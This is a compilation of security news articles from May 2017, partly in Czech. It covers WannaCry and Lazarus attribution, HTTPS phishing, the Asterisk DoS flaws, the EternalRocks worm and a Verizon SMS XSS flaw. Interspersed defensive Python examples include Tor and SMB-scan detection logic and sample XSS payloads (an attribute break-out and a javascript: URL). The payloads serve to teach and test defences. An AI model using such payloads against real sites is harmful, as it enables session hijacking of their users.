Během dvou minut od nakažení prvního stroje se škodlivý kód rozšířil na stovku počítačů v organizaci. Útočnictvo za sebou zanechalo nástroje, jež se tak mohly stát předmětem zkoumání.

WannaCry útočil od února

Kromě nich bylo nalezeno pět druhů malwaru, tři z nich jsou přímo spojeny s hackerskou skupinou Lazarus. Dva ze trojice platí za varianty backdooru Destover, jenž byl použit v útoku na Sony. Třetím kouskem byl trojský kůň Volgmer, jenž byl Lazarem nasazován proti jihokorejským cílům. Novým vzorkem WannaCry bylo do 27. března napadeno nejméně pět organizací. Podle Symantecu zde nelze vysledovat vzorec, podle něhož byly cíle vybrány.

In this case two different backdoors, Alphanc and Bravonc, were used to deploy the ransomware. The short version is that both are malicious programs with ties to Lazarus. Attacks continued on a smaller scale in April. Then came the large-scale attack we all know, which began on 12 May. On that day yet another new version of WannaCry began to spread, exploiting known Windows vulnerabilities (CVE-2017-0144 and CVE-2017-0145) to propagate. As a reminder, Microsoft fixed them in March.

Illustrative photo (source: qimono / Pixabay)

The ransomware spread to computers on the local network, but also to remote machines connected to the internet. All the variants found are very similar; the archives used to distribute the malicious code are encrypted with similar passwords (wcry@123, wcry@2016 and WNcry@2ol7). According to Symantec, the wallets used to receive bitcoins in the first attacks were not used by other groups.

These too are significant indicators that lead Symantec to conclude that the same group is behind these threats. I have already mentioned Lazarus. According to the security firm, WannaCry shares part of its code with the Contopee backdoor, which is linked to Lazarus. One of the variants uses the same ciphers. WannaCry further resembles the Fakepude malware and the Alphanc trojan, both of which are tied to the same hacking group.

Activity of the Lazarus group

At this point it is worth answering who Lazarus is. The group engages in cybercriminal activity and its first documented attacks were recorded in 2009. Its most successful crimes include the already mentioned attack on Sony's film division in 2014. In 2016 the group attacked Bangladesh Bank, the country's central bank, walking away with a staggering $81 million.

In March Kaspersky Lab published a report on the group containing some interesting claims. The details are in that report; here I will only mention that, according to Kaspersky Lab, Lazarus has operated with a large budget from the start and apparently aims to remain financially self-sufficient. Enter the Bluenoroff group, which falls under Lazarus and seems to specialize precisely in raising funds. It essentially earns money to keep Lazarus's operations running, and it does so using malicious code created by Lazarus.

This is what the WannaCry ransom screen looks like
I have already said that the expert community began linking WannaCry to North Korea. Two months ago Kaspersky Lab uncovered a link between Bluenoroff and North Korea in the form of an IP address. Since Bluenoroff is considered part of the Lazarus group, WannaCry, as Lazarus's offspring, may indeed be the work of people from North Korea. This link alone is not sufficient as conclusive evidence, so for now we can only speculate.

In its report, the Russian security firm Kaspersky Lab says that the scale of the Lazarus group's operations, which have grown markedly since 2011, is shocking. Producing malware that is treated as disposable material, replaced by a better weapon in the next attack, cannot be the work of amateurs, the firm says. Lazarus appears to function as a malware factory that then distributes its output through several independent entities. We will probably hear about Lazarus again.


WannaCry should never have spread at all. All it took was to use Windows Update

23.5.2017 Živě.cz Viruses
WannaCry spread massively because of a vulnerability in Windows
The bug let the malware attempt to infect other computers on its own
Yet that bug has been fixed for two months!
Anyone who ran into a screen like this on their PC during the week had to either pay or accept the loss of their data
Reams have been written about last weekend's WannaCry ransomware attack, including here on Živě.cz, but one more myth still needs dispelling, one that was discussed from the very start, especially in media across the ocean.

Is Microsoft to blame?

Many of them initially named the NSA and Microsoft as the main culprits. The National Security Agency supposedly contributed by writing, in its laboratories, programs that exploited a Windows vulnerability, thanks to which the finished virus could spread better across local networks and the internet. And it was precisely these tools, originally intended for NSA cyber operations, that had leaked to the public and ended up in the hands of the WannaCry authors.


Microsoft, on the other hand, was blamed by many commentators on the other side of the Atlantic for refusing to produce patches for old versions of Windows, XP first among them. During the first wave many believed that WannaCry would do the most damage precisely on Microsoft's now-unsupported operating system, which a non-negligible percentage of computers still runs.

WannaCry spread most on Windows 7. Yet the patch has been available since March

A tweet from Costin Raiu, chief analyst at Kaspersky Lab, clearly refuted that hypothesis, however, and indirectly pointed at us ourselves as the main culprits of the whole mess. Well, not us exactly: in the Czech Republic the ransomware has so far had only a minimal impact.

Costin Raiu (@craiu), 19 May 2017, with a chart titled "Over 98% of All WannaCry Victims Were Using Windows 7": "#WannaCry infection distribution by the Windows version. Worst hit - Windows 7 x64. The Windows XP count is insignificant."
From the chart above it is clear that the number of infected Windows XP machines, at least according to Kaspersky Lab, was absolutely... negligible. That version of Windows does not even appear in it. The vast majority of the analysed machines were running Windows 7.

WannaCry could indeed spread very well via Windows 7, because besides the typical manual infection (running the virus by hand, say from an e-mail attachment, and encrypting the PC) it could also exploit that Windows vulnerability, copy itself to other machines on the local network and even on the internet, and run again. That is most likely how large organizations such as the British hospitals mentioned, some railway systems abroad and others got infected.

Microsoft would deserve a slap for such a mess, and the usual verdict of "Yep, leaky Windows again. Good thing I run Linux on my computer," but definitely not in this case. Why? Simply because the patch for that vulnerability, CVE-2017-0145, has officially been out for two months. Microsoft published it as the cumulative fix MS17-010 on 14 March of this year!

An updated Windows could have defended itself better against mass spreading

Since the company rated this patch bundle as critical, it soon reached every workstation connected to the internet through the usual Windows Update subsystem. Well, actually it did not reach them, but it should have. Why that evidently failed to happen in more than one case remains a question; these certainly were not computers cut off from the internet, though, because those would not have been infected so quickly, literally within a few hours.

The only possible explanation is therefore that these were computers without adequate patches, and many observers thus believe that WannaCry was designed specifically for this case. After all, its authors must have known full well that a fix that would reliably prevent its mass spread had long been available. At the same time they knew that many people probably disable or otherwise restrict the automatic installation of updates on their computers, and that this happens more in the East. And it was precisely in the East, above all in Russia, that WannaCry raged by far the most.

It is an operating system with all the latest patches, together with plain common sense when browsing the web, that protects us best of all against malware of every kind.

What does WannaCry actually encrypt?

After activation, the ransomware walks the storage and tries to encrypt files with the extensions listed below. The victim can easily recognize damaged files: their extension is changed to .WNCRY. The file obrazek.jpg thus becomes obrazek.jpg.WNCRY.

.123, .jpeg, .rb, .602, .jpg, .rtf, .doc, .js, .sch, .3dm, .jsp, .sh, .3ds, .key, .sldm, .3g2, .lay, .sldm, .3gp, .lay6, .sldx, .7z, .ldf, .slk, .accdb, .m3u, .sln, .aes, .m4u, .snt, .ai, .max, .sql, .ARC, .mdb, .sqlite3, .asc, .mdf, .sqlitedb, .asf, .mid, .stc, .asm, .mkv, .std, .asp, .mml, .sti, .avi, .mov, .stw, .backup, .mp3, .suo, .bak, .mp4, .svg, .bat, .mpeg, .swf, .bmp, .mpg, .sxc, .brd, .msg, .sxd, .bz2, .myd, .sxi, .c, .myi, .sxm, .cgm, .nef, .sxw, .class, .odb, .tar, .cmd, .odg, .tbk, .cpp, .odp, .tgz, .crt, .ods, .tif, .cs, .odt, .tiff, .csr, .onetoc2, .txt, .csv, .ost, .uop, .db, .otg, .uot, .dbf, .otp, .vb, .dch, .ots, .vbs, .der, .ott, .vcd, .dif, .p12, .vdi, .dip, .PAQ, .vmdk, .djvu, .pas, .vmx, .docb, .pdf, .vob, .docm, .pem, .vsd, .docx, .pfx, .vsdx, .dot, .php, .wav, .dotm, .pl, .wb2, .dotx, .png, .wk1, .dwg, .pot, .wks, .edb, .potm, .wma, .eml, .potx, .wmv, .fla, .ppam, .xlc, .flv, .pps, .xlm, .frm, .ppsm, .xls, .gif, .ppsx, .xlsb, .gpg, .ppt, .xlsm, .gz, .pptm, .xlsx, .h, .pptx, .xlt, .hwp, .ps1, .xltm, .ibd, .psd, .xltx, .iso, .pst, .xlw, .jar, .rar, .zip, .java, .raw.


Phishing sites with HTTPS are on the rise, responding to browser developments
23.5.2017 Root.cz Phishing

The proportion of phishing sites that use HTTPS is growing. They are trying to look more trustworthy and thereby raise their chance of success. It is a natural response to the evolution of browsers, which favour HTTPS.
It has been said many times that HTTPS does not mean a safe website. It only ensures secure communication with the site; it cannot vouch for the good intentions of its operator. More and more often we therefore run into phishing sites that have a trusted certificate and correctly deployed HTTPS.

This is of course mainly because browsers increasingly lean toward HTTPS and, conversely, warn against entering login details on pages that use unencrypted HTTP. Along with legitimate sites, phishing pages that try to manipulate users are thus also being pushed into encryption.

Together with the easy availability of cheap certificates, the automation of their deployment and support in many services and utilities, this brings a very rapid spread of encryption to attack sites as well. Experts at the British company Netcraft analysed phishing sites and their security.

They focused in particular on the start of this year, when Firefox 51 and Chrome 56 were released. Those are the versions from which the browsers warn about entering a password on an unsecured site.

If a phishing site, whose sole goal is precisely to obtain a password, behaves this way, the user is warned fairly insistently. The creators of these fraudulent pages have therefore adapted, and since the start of this year a dramatic rise in HTTPS can be observed on their sites too.

Chart (Netcraft): proportion of phishing sites using HTTPS
Before the change in browsers, the proportion of phishing sites using HTTPS hovered around 5% for a long time. Right afterwards it began to climb quickly, and within less than two months it reached three times the original figure. This may be due to improvements on the part of phishing-site creators, or simply to HTTPS spreading to ordinary sites, which can be compromised and abused for phishing.

Attackers have clearly adapted to the new trend, and their activity is thus in effect an unintended side effect of the original effort to improve security on the web. Users should therefore be strongly warned not to rely blindly on the presence of the green padlock. Even though that is exactly what was drummed into them for years, they now also need to be taught to check the domain name. And even that may not always be enough.

An Apple phishing site using HTTPS
The findings about the use of individual certificate authorities are also interesting. In the first quarter Netcraft recorded more than 47,000 phishing sites, and among those with HTTPS it found a DV certificate from Let's Encrypt or Comodo in 96% of cases. Two thirds of those came from the still-growing Let's Encrypt authority, which issues certificates automatically and free of charge.

The two authorities most often abused for phishing
The authorities maintain that it is not their role to judge the harmfulness of individual sites or the good intentions of their operators. Easy access to trusted certificates, however, evidently also benefits attackers, who abuse them on a large scale. The question is therefore whether this approach should be reconsidered. But who would assess a new site's purpose at the time it is created, how would they do it, and how would they know it will not change in the future?

Netcraft has its own solution, which rates how dangerous a given domain is by its name. Domains such as www.ll-airbnb.com, payqal.limited or dropbox.com.login.verify.danaharperandfriends.com are thus automatically scored and blocked. Such a solution could in theory prevent at least a sizeable share of phishing attacks. We can expect, though, that if something like this is deployed in the future, attackers will adapt again and register domains in a form that still gets them a certificate. You cannot stop progress; HTTPS will soon be everywhere.
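The kind of name-only check described above, as an added example that is not Netcraft's scoring logic and not code from the original article. It applies two heuristics to the hostname alone: a protected brand used as a decoy label to the left of the registrable domain (dropbox.com.login.verify.<registrable>), and a registrable label that embeds a brand or sits one edit away from it (ll-airbnb, payqal). The brand list is a constructed watch-list, and the registrable domain is approximated as the last two labels; production code would consult the Public Suffix List.

```python
"""Name-only phishing triage in the spirit of the Netcraft domain check.

Added example, not Netcraft's code. BRANDS is a constructed watch-list and
registrable() assumes a one-label public suffix; both are simplifications.
"""
from typing import List, Tuple

BRANDS = {"paypal", "airbnb", "dropbox", "apple"}      # constructed watch-list


def registrable(host: str) -> Tuple[str, List[str]]:
    """(registrable domain, labels to its left). Assumes a one-label public suffix."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: each substitution, insertion or deletion costs one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                  # delete ca
                           cur[j - 1] + 1,               # insert cb
                           prev[j - 1] + (ca != cb)))    # substitute
        prev = cur
    return prev[-1]


def suspicious(host: str) -> List[str]:
    """Reasons this hostname looks like brand impersonation; empty means none found."""
    reg, rest = registrable(host)
    sld = reg.split(".")[0]
    reasons: List[str] = []
    for label in rest:                       # decoy brand in the subdomain part
        if label in BRANDS:
            reasons.append(f"brand '{label}' in subdomain of {reg}")
    for brand in sorted(BRANDS):             # sorted so output order is stable
        if sld == brand:
            continue                         # the brand's own registrable name
        if brand in sld:
            reasons.append(f"'{brand}' embedded in registrable label '{sld}'")
        elif edit_distance(sld, brand) == 1:
            reasons.append(f"'{sld}' is one edit from '{brand}'")
    return reasons


if __name__ == "__main__":
    for h in ("www.paypal.com", "payqal.limited", "www.ll-airbnb.com",
              "dropbox.com.login.verify.danaharperandfriends.com"):
        print(h, "->", suspicious(h) or "ok")
```

The three hostnames quoted in the article each trigger exactly one heuristic, while the brand's own domain is left alone; the article's closing point still stands, since an attacker who learns the rules will register names that pass them.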


Watching films and series online: a threat we ignore
23.5.2017 cdr.cz Security
Watching films online may seem like harmless fun during which only "a few" ads pop up. We will not go into the legality of the practice; instead we focus on the security aspects, which can have very unpleasant consequences.
Illegal copying of films has been with us, is with us, and will probably be with us for some time yet. Its form, however, changes over time. At first we copied from one VHS tape to another, then from DVD to DVD, then we downloaded from the internet... There are many forms. Lately, though, watching films online has become the most popular. There is a range of dubious portals that offer free viewing. Whether the content is legal or not, we leave to others.

Money in the lead role

These portals have to survive somehow, so they live off ads. Unfortunately these are the worst kinds of ads, straight from the seventh circle of internet hell: unbelievably annoying pop-ups, often with adult content, flashing banners with fake warnings that your computer is infected, or phishing buttons that say "download" but take you somewhere you definitely do not want to go.

This is malvertising, a portmanteau of malware (malicious software) and advertising. These "ads" are not trying to lure you to some new product or service. They just want you to click the flashing banner, whether it announces that you have won a new iPhone or anything else. It is all junk that can make a real mess of your computer.

The biggest problem, as we see it, is that when you click such an ad you may unknowingly or accidentally accept some dialog and download ransomware (or another kind of malware) to your computer. It encrypts your data, and off you go to restore the system from backup. Ransomware deserves an article of its own, though, so we will not deal with it here.

Another way to extract sensitive data from you is social engineering, which is used above all in phishing. You may remember the case where people were shown a window saying that the Czech Police had locked their computer and demanding that they pay a fine (in other words, a ransom). Still the most popular is the message that you are the 1,000,000th visitor to the site and have won something. You would not believe how many people fall for it.

Experienced users can find their way around these windows, but put such a computer in the hands of children, or conversely of someone older who did not grow up in the virtual world, and you have a problem. An inexperienced eye simply cannot tell whether a notice from the Czech Police, or a warning about an infected computer with an offer to remove the threats (or anything else), is legitimate or just a bluff from the attacker.

And how to protect yourself?

If you use Adobe Flash in your browser, you should stop. The plugin has been superseded by technologies such as HTML5. It is also as leaky as a sieve, so exploiting one of its security bugs need not be all that hard. If you do not need it, browsing the internet without an active Flash is much safer. Fortunately, most browsers already block it by default and it has to be enabled manually.

In many cases even AdBlock does not help, since most such sites detect it and prevent the user from playing the film. Or the ads from dubious sources are not on the blacklist and are shown anyway. In the end you do not rid yourself of the harmful content, and you deprive decent sites of part of their livelihood. To be fair to it, though, it does save you from some pop-up windows.

If you are partial to sites of dubious character, remember that you should have an up-to-date antivirus. It can detect and remove threats with relatively greater success. The problem arises with "zero-day" threats, which exploit a fresh flaw in the system and which the antivirus products do not yet have in their databases.

Once some junk does get onto your computer, try to remove it as quickly as possible. In the worse case, the malicious code may try to get itself allowed through the firewall and granted an exception in the security software. That creates a hole in the system's resident shield, and the hacker can steal your sensitive data.

In conclusion

To close, one piece of advice worth its weight in gold. If you do not want problems with your computer and its security, do not open such portals at all; you will save yourself trouble. Today there are many ways to watch films online, for example for a small fee, whether it is Netflix or some Czech variant of it.

Yes, you may object that when you just want to watch a film, you do not feel like paying any fee. But that was not the subject of this article, so whether such behaviour is right we leave to you.


Critical DoS Flaws Patched in Asterisk Framework

23.5.2017 securityweek Vulnerability
Updates released on Friday for the Asterisk communications framework address three critical denial-of-service (DoS) vulnerabilities discovered by Sandro Gauci, a penetration tester and researcher who specializes in VoIP and communications systems.

Asterisk, considered the world’s most popular open source communications framework, is used by government agencies, carriers and other businesses, including most Fortune 1000 companies. According to its developers, more than one million IP PBX systems, VoIP gateways, conference servers and other solutions rely on Asterisk.

Gauci discovered in April that the project is affected by three potentially serious vulnerabilities that can be exploited to cause the system to crash. Separate advisories have been published by Asterisk developers for each of the flaws.

The vulnerabilities affect all versions of Asterisk 13, 14 and Certified Asterisk 13.13. The issues have been addressed with the release of versions 13.15.1, 14.4.1 and 13.13-cert4.

One of the security holes can be exploited by a remote attacker to cause Asterisk to exhaust all available memory by sending a specially crafted Signalling Connection Control Part (SCCP) packet. Removing or disabling support for the SCCP protocol prevents potential attacks.

“A remote memory exhaustion can be triggered by sending an SCCP packet to Asterisk system with ‘chan_skinny’ enabled that is larger than the length of the SCCP header but smaller than the packet length specified in the header. The loop that reads the rest of the packet doesn’t detect that the call to read() returned end-of-file before the expected number of bytes and continues infinitely. The ‘partial data’ message logging in that tight loop causes Asterisk to exhaust all available memory,” Asterisk developers wrote in their advisory.
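The defect in the advisory is a read loop that keeps spinning when read() signals end-of-file. The block below is an added example, not Asterisk's code: a reader for a simplified length-prefixed frame (assumed layout: 4-byte little-endian payload length, 4-byte reserved field, then the payload) that fails fast on a truncated packet instead of looping. The socketpair, the sample payloads and the MAX_PAYLOAD bound are constructed for the example.

```python
"""Reading a length-prefixed message without the infinite-loop-on-EOF defect.

Added example, not Asterisk's code. Assumed framing (a simplification of the
SCCP/Skinny header): 4-byte little-endian payload length, 4-byte reserved
field, then the payload; the length counts the bytes after the 8-byte header.
"""
import socket
import struct
from typing import Tuple

HEADER_LEN = 8
MAX_PAYLOAD = 4096   # assumed upper bound; bound allocations by the protocol maximum


class TruncatedPacket(Exception):
    """The peer closed the connection before the advertised payload arrived."""


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes, or raise TruncatedPacket.

    The vulnerable loop keeps calling recv() while fewer than n bytes are in,
    but never checks for a zero-length result. At end-of-file recv() returns
    b'' every time, so that loop never terminates, and logging "partial data"
    on each pass is what exhausts memory. The empty-chunk check is the fix.
    """
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:                                    # EOF: fail, do not spin
            raise TruncatedPacket(f"wanted {n} bytes, got {len(buf)}")
        buf.extend(chunk)
    return bytes(buf)


def read_message(sock: socket.socket) -> Tuple[int, bytes]:
    """Parse one framed message; returns (reserved field, payload)."""
    length, reserved = struct.unpack("<II", recv_exact(sock, HEADER_LEN))
    if length > MAX_PAYLOAD:                             # also refuse absurd lengths
        raise ValueError(f"declared length {length} exceeds {MAX_PAYLOAD}")
    return reserved, recv_exact(sock, length)


def _deliver(packet: bytes) -> Tuple[int, bytes]:
    """Push a constructed packet through a socketpair, then close the sender."""
    sender, receiver = socket.socketpair()
    try:
        sender.sendall(packet)
        sender.close()                                   # receiver will see EOF
        return read_message(receiver)
    finally:
        receiver.close()


def demo_complete() -> Tuple[int, bytes]:
    """A well-formed packet: header length matches the bytes that follow."""
    body = b"\x00\x00\x00\x00KeepAlive"                  # constructed payload
    return _deliver(struct.pack("<II", len(body), 0) + body)


def demo_truncated() -> str:
    """Header promises 64 payload bytes but only 8 are sent: the reader fails fast."""
    body = bytes(range(8))
    try:
        _deliver(struct.pack("<II", 64, 0) + body)
    except TruncatedPacket as err:
        return str(err)
    return "no error"


if __name__ == "__main__":
    print(demo_complete())
    print(demo_truncated())
```

The second demo is exactly the advisory's trigger shape, a packet longer than the header but shorter than the length the header declares; with the EOF check the reader raises after one pass instead of logging forever.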

The other two vulnerabilities found by Gauci affect PJSIP, an open source multimedia communication library that implements SIP (Session Initiation Protocol) and other protocols. The flaws can be exploited remotely to cause a crash by sending specially crafted SIP packets.

The latest Asterisk releases include a version of PJSIP that addresses these vulnerabilities. However, other projects using the PJSIP library are vulnerable as well, and they will need to obtain upstream patches to protect their users against attacks.


EternalRocks Network Worm Leverages 7 NSA Hacking Tools

23.5.2017 securityweek BigBrothers
EternalRocks Worm Uses NSA Exploits to Compromise Systems and Install DoublePulsar Backdoor

A recently discovered network worm leverages a total of seven hacking tools stolen from the National Security Agency (NSA)-linked Equation Group.

Dubbed EternalRocks and capable of self-replication, the threat emerged over the past couple of weeks, with the most recent known sample dated May 3. The malware was discovered by security researcher Miroslav Stampar, who also found that the tool was initially called MicroBotMassiveNet.

The seven NSA hacking tools bundled into the worm are the EternalBlue, EternalChampion, EternalRomance and EternalSynergy exploits, the DoublePulsar backdoor, and the ArchiTouch and SMBTouch SMB reconnaissance tools.

The exploits were made public in April by the hacker group going by the name of Shadow Brokers and are said to have been stolen from the NSA-linked threat actor Equation Group last year. Within days after the tools were released, Microsoft said that it had already patched the vulnerabilities targeted by the exploits with its March 2017 security updates.

However, because not all vulnerable devices have been patched, these exploits continue to be effective, and the recent WannaCry ransomware outbreak is the best example of that. The WannaCry malware abused the EternalBlue exploit for distribution, and other threats did the same, including the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

The EternalRocks worm is yet another malicious program attempting to cash in on the release of these exploits. Its purpose seems pretty straightforward: it compromises systems to install the DoublePulsar backdoor on them.

The worm uses a two-stage infection process to deliver its payload, but appears to be more of a research project at the moment than an actual malicious tool.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe and taskhost.exe. Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (command and control) communication requesting further instructions,” Stampar notes.

The second-stage payload is downloaded only after a 24-hour period has passed, and is hidden as the taskhost.exe process. The payload drops the exploit pack shadowbrokers.zip, unpacks contained directories payloads/, configs/ and bins/, and then starts a random scan of opened 445 (SMB) ports on the Internet.

EternalRocks also runs contained exploits (inside directory bins/) and pushes the first stage malware through payloads (inside directory payloads/). Moreover, the running Tor process continues to wait for further instructions from the C&C.

In an emailed comment, Michael Patterson, CEO of Plixer, told SecurityWeek that EternalRocks, currently the “first known malware incorporating all seven of the NSA hacking tools,” is clearly a more stealthy tool, given its delayed Tor communication and that administrators looking to keep their systems safe from this threat might have already lost the battle with it.

“Once a device is infected, applying a subsequent patch does not remove the malware. The most effective way for security teams to monitor for any infected devices is to leverage network traffic analytics to look for any historical Tor connections leaving the organization,” Patterson said.

“The race to detect and stop all malware was lost years ago. Organizations must constantly monitor their environments for anomalous behaviors, maintain a historical forensic database, and have a well-defined storage backup and recovery process for all critical data,” he concluded.
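The two behaviours the article attributes to EternalRocks, a Tor C&C channel that opens before the delayed second stage and a random scan of TCP/445 across the Internet, are both visible in flow records. The block below is an added example, not from the page or from any vendor product: it parses constructed flow-log lines and flags outbound connections to known Tor relays (any port, including ones dated before a patch was applied) and internal hosts fanning out to port 445 on many distinct external addresses. The relay list, internal ranges, thresholds and the log itself are all constructed.

```python
"""Flow-log triage for the EternalRocks behaviours: Tor C&C and SMB fan-out.

Added example, not from the article or any vendor. TOR_RELAYS, INTERNAL,
SCAN_THRESHOLD and FLOW_LOG are constructed for the demonstration.
"""
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

# Constructed. A real deployment keeps a dated history of the Tor consensus so
# that connections from before the patch date can still be matched.
TOR_RELAYS = {"198.51.100.7", "203.0.113.9"}
INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
            ip_network("192.168.0.0/16")]                  # assumed site ranges
SCAN_THRESHOLD = 20      # distinct external hosts on 445 from one source

# Constructed flow log: timestamp,src,dst,dport,proto
FLOW_LOG = (
    "2017-05-03T09:00:01Z,10.0.5.21,198.51.100.7,9001,tcp\n"
    "2017-05-03T09:00:05Z,10.0.5.21,93.184.216.34,443,tcp\n"
    + "".join(f"2017-05-04T09:01:{i:02d}Z,10.0.5.21,192.0.2.{i},445,tcp\n"
              for i in range(25))
    + "2017-05-04T09:30:00Z,10.0.7.3,10.0.7.4,445,tcp\n"
    + "2017-05-04T09:31:00Z,10.0.7.3,203.0.113.9,443,tcp\n"
)

Flow = Tuple[datetime, str, str, int, str]


def parse_flows(text: str) -> List[Flow]:
    flows: List[Flow] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split(",")
        flows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                      src, dst, int(dport), proto))
    return flows


def is_internal(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL)


def tor_contacts(flows: List[Flow]) -> List[Tuple[str, str, str]]:
    """(src, relay, first seen) for each outbound flow to a known relay, any port."""
    seen: Dict[Tuple[str, str], datetime] = {}
    for ts, src, dst, _dport, _proto in flows:
        if dst in TOR_RELAYS and (src, dst) not in seen:
            seen[(src, dst)] = ts
    return [(s, d, t.isoformat()) for (s, d), t in seen.items()]


def smb_scanners(flows: List[Flow], threshold: int = SCAN_THRESHOLD) -> Dict[str, int]:
    """Sources that reached TCP/445 on at least `threshold` distinct external hosts."""
    targets: Dict[str, set] = defaultdict(set)
    for _ts, src, dst, dport, proto in flows:
        if proto == "tcp" and dport == 445 and not is_internal(dst):
            targets[src].add(dst)
    return {src: len(t) for src, t in targets.items() if len(t) >= threshold}


def triage(text: str = FLOW_LOG) -> Dict[str, object]:
    flows = parse_flows(text)
    return {"tor": tor_contacts(flows), "scanners": smb_scanners(flows)}


if __name__ == "__main__":
    print(triage())
```

Internal-to-internal 445 traffic is deliberately ignored, since it is normal file-sharing noise; the signal is one host touching dozens of unrelated external addresses on that port. Matching on the Tor relay address rather than on port 9001 catches relays that listen on 443, as the second constructed host does.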


Verizon Messages App Allowed XSS Attacks Over SMS

23.5.2017 securityweek Mobil
Until a few months ago, Verizon’s Messages service was affected by a vulnerability that could have easily been exploited to launch cross-site scripting (XSS) attacks using SMS messages.

Verizon Messages (Message+) is a text and multimedia messaging service that allows users to send and receive messages across multiple types of devices, including mobile and desktop, without interruption.

Researcher Randy Westergren analyzed the application’s SMS feature and after sending some URLs to a test account to see how each type of link is rendered, he noticed that adding single quotation marks to a URL allowed him to break out of the HREF attribute and execute arbitrary JavaScript code.

According to the expert, an attacker simply had to send a specially crafted SMS to the targeted user; once the user clicked on the malicious message, the attacker could take complete control of the victim's session and any of its functionality, including sending SMS messages on behalf of the victim or intercepting their messages.

The researcher sent his proof-of-concept (PoC) code along with a video and screenshots to Verizon in mid-November 2016. The flaw was resolved by the telecoms giant within a few weeks, but its details were disclosed only on Sunday.

The vendor addressed the vulnerability using the DOM API, which is the fix suggested by Westergren.
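The bug class above, a URL interpolated into a single-quoted href so that a quote in the message ends the attribute and starts a new one, beside a safe construction. This is an added example and not Verizon's code: Verizon's fix went through the DOM API, while this block shows the equivalent discipline when HTML must be produced as a string (scheme allow-list plus context-appropriate escaping). The sample messages are constructed.

```python
"""Linkifying untrusted message text: the attribute break-out and a safe build.

Added example, not Verizon's code. linkify_vulnerable reproduces the class of
bug described (unescaped URL in a single-quoted href); linkify_safe allow-lists
the scheme and escapes for both attribute and text context. Samples constructed.
"""
import html
import re
from urllib.parse import urlsplit

# Anything that looks like scheme://... up to whitespace, quotes included.
URL_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.\-]*://\S+")
ALLOWED_SCHEMES = {"http", "https"}

SAMPLE_INJECT = "call me https://example.com/'onmouseover='alert(1) now"
SAMPLE_SCHEME = "see javascript://example.com/%0aalert(1)"


def linkify_vulnerable(text: str) -> str:
    # Defect: the matched URL is interpolated unescaped into a single-quoted
    # attribute, so a quote inside the URL closes href and starts a new attribute.
    return URL_RE.sub(lambda m: f"<a href='{m.group(0)}'>{m.group(0)}</a>", text)


def linkify_safe(text: str) -> str:
    def repl(m) -> str:
        url = m.group(0)
        parts = urlsplit(url)
        if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
            return html.escape(url)              # render as inert text, no link
        safe = html.escape(url, quote=True)      # & < > " and ' are all encoded
        return f'<a href="{safe}" rel="noopener noreferrer">{safe}</a>'
    return URL_RE.sub(repl, text)


def injected_attribute(markup: str) -> bool:
    """True if an on* event-handler attribute ended up inside a generated <a> tag."""
    return re.search(r"<a\b[^>]*[\s'\"/]on\w+=", markup, re.I) is not None


if __name__ == "__main__":
    for sample in (SAMPLE_INJECT, SAMPLE_SCHEME):
        print("vulnerable:", linkify_vulnerable(sample))
        print("safe:      ", linkify_safe(sample))
```

The second sample shows why the scheme check is separate from escaping: a javascript: URL contains nothing that needs escaping, yet it must never become a clickable link.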

This was not the first time the researcher had found a potentially serious flaw in a Verizon service. In January 2015, Westergren disclosed a vulnerability in Verizon’s FiOS web service that could have been exploited to hijack email accounts.

Last year, the expert discovered a critical security hole in Verizon’s webmail service that could have been leveraged by hackers to silently forward a user’s emails to an arbitrary address.


Windows 7 Most Hit by WannaCry Ransomware

23.5.2017 securityweek Ransomware
Most of the computers affected by the WannaCry ransomware outbreak were running Windows 7, security researchers have revealed.

Initially, the malware was believed to have hit mostly computers running Windows XP, mainly because of its attack vector – exploiting a Server Message Block (SMB) version 1 vulnerability. According to a tweet from Kaspersky Lab’s director of Global Research and Analysis Team Costin Raiu, however, the number of Windows XP infections was insignificant.

Windows 7 x64 machines were hit the most, accounting for 60.35% of infections, with Windows 7 x86 coming in second, at 31.72%, the researcher also revealed. These two Windows 7 versions, along with Windows 7 Home x64 and x86 editions, accounted for around 98% of all WannaCry infections, it seems.

Costin Raiu (@craiu), 19 May 2017, with a chart titled "Over 98% of All WannaCry Victims Were Using Windows 7": "#WannaCry infection distribution by the Windows version. Worst hit - Windows 7 x64. The Windows XP count is insignificant."

WannaCry made a name for itself after researchers discovered it had a worm component abusing the NSA-linked EternalBlue and DoublePulsar exploits to automatically spread to other vulnerable machines. The exploit was said to target all Windows versions from XP to 8.1 (Windows Server 2003 & 2008 as well), but the worm is now said to be reliable only when hitting Windows 7.

Actual infection numbers aren’t out yet, but researchers estimate that around 420,000 machines have been hit by the ransomware to date. Because a researcher registered a kill-switch domain soon after the outbreak started (upon infection, the malware would beacon to a hardcoded domain and terminate its process when receiving a response), only some of these machines ended up infected with WannaCry.

Microsoft resolved the targeted SMB vulnerability in March and also released an emergency patch for unsupported platform versions on May 13, only one day after the ransomware outbreak started. In the aftermath of WannaCry, however, researchers discovered that both a crypto-currency mining botnet and a backdoor had been abusing the exploit for weeks. The exploit is also used by a ransomware family called UIWIX.

WannaCry hasn’t infected only PCs, but other types of machines as well, including medical devices. In fact, Britain’s National Health Service (NHS) was among the first organizations to have been hit by the malware.

Soon after the initial wave of infections, security researchers started observing new WannaCry variations, including some that didn’t use a kill-switch domain. What’s more, Cyphort researchers reported last week that a new ransomware variant was using a kill-switch domain that couldn’t be registered.

